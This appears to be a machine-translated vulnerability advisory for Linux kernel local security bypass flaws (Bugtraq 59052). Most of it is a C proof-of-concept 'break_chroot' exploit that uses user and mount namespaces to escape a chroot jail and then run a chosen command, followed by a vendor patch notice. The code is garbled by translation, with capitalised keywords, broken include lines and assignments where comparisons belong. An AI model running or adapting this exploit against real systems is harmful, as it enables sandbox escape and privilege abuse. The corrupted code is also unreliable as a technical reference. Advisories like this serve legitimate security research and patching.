Multiple Linux Kernel local security bypass vulnerabilities

Release date:
Updated on:

Affected Systems:
Linux kernel
Description:
--------------------------------------------------------------------------------
Bugtraq id: 59052
 
Linux Kernel is the Kernel of the Linux operating system.
 
Linux kernel has multiple security bypass vulnerabilities. Attackers can exploit these vulnerabilities to bypass certain security restrictions and perform unauthorized operations.
 
<* Source: Andrew Lutomirski
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
# Define _ GNU_SOURCE
# Include <unistd. h>
# Include <sched. h>
# Include <sys/types. h>
# Include <sys/wait. h>
# Include <fcntl. h>
# Include <stdio. h>
# Include <string. h>
# Include <err. h>
 
# Ifndef CLONE_NEWUSER
# Define CLONE_NEWUSER 0x10000000
# Endif
 
Static void printcwd (void)
{
/* This is fuugly .*/
Static int lastlen =-1;
Char buf [8192];
If (getcwd (buf, sizeof (buf ))){
If (strlen (buf )! = Lastlen)
Printf ("% s \ n", buf );
Lastlen = strlen (buf );
} Else {
Warn ("getcwd ");
}
}
 
Int fn (void * unused)
{
Int I;
Int fd;
 
Fd = open ("/", O_RDONLY | O_DIRECTORY );
If (fd =-1)
Err (1, "open (\".\")");
If (unshare (CLONE_NEWUSER )! = 0)
Err (1, "unshare (CLONE_NEWUSER )");
If (unshare (CLONE_NEWNS )! = 0)
Err (1, "unshare (CLONE_NEWNS )");
If (fchdir (fd )! = 0)
Err (1, "fchdir ");
Close (fd );
 
For (I = 0; I <100; I ++ ){
Printcwd ();
If (chdir ("..")! = 0 ){
Warn ("chdir ");
Break;
}
}
 
Fd = open (".", O_PATH | O_DIRECTORY );
If (fd =-1)
Err (1, "open (\".\")");
 
If (fd! = 3 ){
If (dup2 (fd, 3) =-1)
Err (1, "dup2 ");
Close (fd );
}
_ Exit (0 );
}
 
Int main (int argc, char ** argv)
{
Int dummy;
 
If (argc <2 ){
Printf ("usage: break_chroot command args... \ n"
"You won't be entirely out of jail./is still the jail root. \ n ");
Return 1;
}
 
Close (3 );
 
If (signal (SIGCHLD, SIG_DFL )! = 0)
Err (1, "signal ");
 
If (clone (fn, & dummy, CLONE_FILES | SIGCHLD, 0) =-1)
Err (1, "clone ");
 
Int status;
If (wait (& status) =-1)
Err (1, "wait ");
If (! WIFEXITED (status) | WEXITSTATUS (status )! = 0)
Errx (1, "child failed ");
If (fchdir (3 )! = 0)
Err (1, "fchdir ");
Close (3 );
 
Execv (argv [1], argv + 1 );
Err (1, argv [1]);
 
Return 0;
}

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Linux
-----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
 
Http://www.kernel.org/